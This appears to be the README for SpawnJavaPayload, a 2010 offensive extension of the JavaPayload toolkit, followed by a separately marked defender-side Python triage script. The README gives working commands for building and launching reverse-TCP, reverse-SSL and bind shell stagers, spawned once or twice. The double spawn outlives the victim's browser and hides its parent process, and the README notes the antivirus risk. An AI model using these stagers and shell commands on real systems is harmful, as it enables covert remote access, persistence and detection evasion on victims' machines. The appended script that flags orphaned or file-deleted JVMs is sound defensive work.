© 2010 Michael 'mihi' Schierl, <schierlm at users dot sourceforge dot net>
Download SpawnJavaPayload-0.1.zip (both source and compiled classes, 19 KB)
Based on/Requires JavaPayload 0.2
JavaPayload contains useful payloads written in pure Java. There is one drawback to using them, though: Java is often embedded in other programs (such as web browsers), and when the user stops using your web site, your payload is killed together with the hosting process.
Therefore, this archive provides a general framework to dynamically create stagers that do not run inside the victim process but spawn a new process and run inside that one instead. This will not work for stagers, like JDWPTunnel, that depend on some external state of the process they are loaded into, but any other stager that can build standalone class files can be used.
There is one drawback here as well: as the new process has to load the class from disk, your stager is dumped to disk (and deleted later), which may increase the risk of antivirus detection. On the other hand, in the main usage scenario for these stagers - Java applets - the applet has been stored to disk anyway (in the browser cache and/or the Java plugin cache).
The requirements are the same as for JavaPayload: JRE 1.2 on the victim machine is enough :-)
To use SpawnJavaPayload, you need the same libraries on the classpath as for JavaPayload, including ASM and JavaPayload.jar, and additionally you have to add SpawnJavaPayload.jar.
Next, you have to create new stagers for all the stagers you want to "convert". To convert all the standard stagers shipped with JavaPayload 0.2, use this command:
java javapayload.builder.SpawnStagerBuilder ReverseTCP ReverseSSL BindTCP BindMultiTCP
This creates a file called SpawnStagers.jar that contains new stagers whose names start with Spawn, such as SpawnBindTCP. After adding the jar to the class path, they can be used like any other stager, for example:
java javapayload.handler.stager.StagerHandler SpawnReverseTCP localhost # -- JSh
java javapayload.loader.StandaloneLoader SpawnReverseTCP localhost 1687 -- JSh
You can even run SpawnStagerBuilder on these spawn stagers themselves to create stagers that spawn once more. This can be useful on systems (like Windows) where the parent-process information is lost when the parent process dies: spawning twice creates a process that is not related to any other process.
copy SpawnStagers.jar SpawnStagers2.jar
set CLASSPATH=SpawnStagers2.jar;%CLASSPATH%
java javapayload.builder.SpawnStagerBuilder SpawnReverseTCP SpawnReverseSSL SpawnBindTCP SpawnBindMultiTCP
java javapayload.handler.stager.StagerHandler SpawnSpawnReverseTCP localhost # -- JSh
java javapayload.loader.StandaloneLoader SpawnSpawnReverseTCP localhost 1687 -- JSh
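The two properties described above - the stager class is written to disk and deleted again while the spawned JVM keeps running, and a double spawn leaves a JVM with no living parent - are exactly what a defender can look for. The following is an added triage example, not part of SpawnJavaPayload or JavaPayload: it takes a process table shaped like Linux /proc data (pid, ppid, command line), supplied here as constructed sample records rather than read from a live host, and flags java processes whose classpath entries no longer exist on disk or whose parent process is gone. The `Proc` record, the helper names and the sample command lines are assumptions made for this example.

```python
"""Added defender-side example (not SpawnJavaPayload code): spot JVMs that
were started from a class file that has since been deleted, or that have been
reparented because their parent process died (the double-spawn case)."""
import os
import shlex
import tempfile
from dataclasses import dataclass


@dataclass
class Proc:
    """Minimal process record; field names assumed for this example."""
    pid: int
    ppid: int
    cmdline: str


def _argv(proc):
    # shlex handles quoted POSIX command lines; Windows paths with
    # backslashes would need a different splitter (assumption: POSIX here).
    return shlex.split(proc.cmdline)


def is_java(proc):
    """True if the command is a java launcher (basename java or java.exe)."""
    argv = _argv(proc)
    return bool(argv) and os.path.basename(argv[0]) in ("java", "java.exe")


def classpath_entries(proc):
    """Classpath entries passed via -cp/-classpath, split on the OS path separator."""
    argv = _argv(proc)
    for i, arg in enumerate(argv):
        if arg in ("-cp", "-classpath") and i + 1 < len(argv):
            return argv[i + 1].split(os.pathsep)
    return []


def missing_classpath_entries(proc):
    """Classpath entries the JVM was started from that are no longer on disk."""
    return [p for p in classpath_entries(proc) if not os.path.exists(p)]


def is_orphaned(proc, by_pid):
    """True if the parent is gone: reparented to PID 1 or parent no longer in the table.
    Noisy for services legitimately started by init; scope to user sessions in practice."""
    return proc.ppid == 1 or proc.ppid not in by_pid


def triage(procs):
    """Return {pid: [reasons]} for java processes matching either heuristic."""
    by_pid = {p.pid: p for p in procs}
    findings = {}
    for p in procs:
        if not is_java(p):
            continue
        reasons = []
        missing = missing_classpath_entries(p)
        if missing:
            reasons.append("classpath entry no longer on disk: " + ", ".join(missing))
        if is_orphaned(p, by_pid):
            reasons.append("parent process gone (reparented to PID 1)")
        if reasons:
            findings[p.pid] = reasons
    return findings


def sample_procs():
    """Constructed process table: a benign JVM, a JVM whose dropped class file
    has already been deleted, and a JVM that lost its parent."""
    workdir = tempfile.mkdtemp(prefix="spawn-triage-")
    present = os.path.join(workdir, "app.jar")
    with open(present, "wb"):
        pass                                   # exists on disk
    deleted = os.path.join(workdir, "dropped-then-deleted.jar")  # never created
    return [
        Proc(1, 0, "/sbin/init"),
        Proc(4000, 1, "/usr/bin/firefox"),
        Proc(4100, 4000, "java -cp " + present + " com.example.App"),   # benign
        Proc(4200, 4000, "java -cp " + deleted + " SpawnReverseTCP"),   # file gone
        Proc(4300, 1, "java -cp " + present + " SpawnSpawnReverseTCP"), # orphaned
    ]


if __name__ == "__main__":
    for pid, reasons in sorted(triage(sample_procs()).items()):
        print(pid, "->", "; ".join(reasons))
```

On a real host the records would come from /proc (or a process-listing API on Windows, where the classpath separator is `;` as in the `set CLASSPATH` line above); the heuristics are deliberately simple and produce false positives for long-running services, so they are a starting point for triage rather than an alert on their own.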